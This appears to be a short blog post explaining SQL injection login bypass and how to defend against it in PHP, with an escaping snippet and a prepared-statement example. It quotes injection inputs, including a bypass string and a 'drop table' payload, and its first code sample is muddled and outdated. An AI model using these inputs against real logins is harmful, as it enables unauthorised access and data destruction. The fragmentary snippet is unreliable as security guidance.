The basic attack is login form bypass, which has already been discussed in a
couple of previous posts. In this type of SQL injection, we inject queries
like 1' OR '1'='1 into the user name and password fields.
The code used in these types of websites can easily be
worked around with the queries mentioned above.
Apart from this, the user can also delete the database by executing "' drop
table database; --".
The code
below allows the queries
You will have to use mysql_real_escape_string in the PHP code.
Here is the PHP code that you can copy and paste.
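<?php
// mysql_real_escape_string() requires a MySQL connection (see mysql_connect());
// it belongs to the old mysql extension, which was removed in PHP 7.0.
$badword = "' OR 1 '";
// Escape the quotes so the value cannot close the string literal in the query.
$badword = mysql_real_escape_string($badword);
$message = "SELECT * from database WHERE password = '$badword'";
echo "Blocked " . $message;
?>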
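The mysql_* functions used above are not available from PHP 7.0 onward, so the same defence is normally written with prepared statements. The following is an added example, not code from the original post: it puts a login check built by string concatenation beside one using a PDO prepared statement and runs the input quoted earlier through both; the concatenated check accepts it and the prepared one does not. The users table, its columns, the sample account and both function names are assumptions, and an in-memory SQLite database is used so the script runs on its own.

```php
<?php
// Added example; table, column and function names are hypothetical.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');

// Constructed sample account; only a hash of the password is stored.
$insert = $pdo->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
$insert->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);

// BEFORE: input is concatenated into the SQL text, so a quote in the input
// ends the string literal and the remainder is parsed as SQL.
function loginConcatenated(PDO $pdo, string $username, string $password): bool
{
    $sql = "SELECT COUNT(*) FROM users WHERE username = '$username' "
         . "AND password_hash = '$password'";
    return (int) $pdo->query($sql)->fetchColumn() > 0;
}

// AFTER: the statement is prepared with a placeholder, the value is bound as
// data, and the password is verified in PHP against the stored hash.
function loginPrepared(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $hash = $stmt->fetchColumn();   // false when no row matches
    return is_string($hash) && password_verify($password, $hash);
}

// The input quoted in the post, submitted in both fields.
$input = "1' OR '1'='1";

echo "concatenated, injected input: ";
var_dump(loginConcatenated($pdo, $input, $input));
echo "prepared, injected input:     ";
var_dump(loginPrepared($pdo, $input, $input));
echo "prepared, real credentials:   ";
var_dump(loginPrepared($pdo, 'alice', 'correct horse'));
```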
Hope this was useful. Please like, subscribe and follow.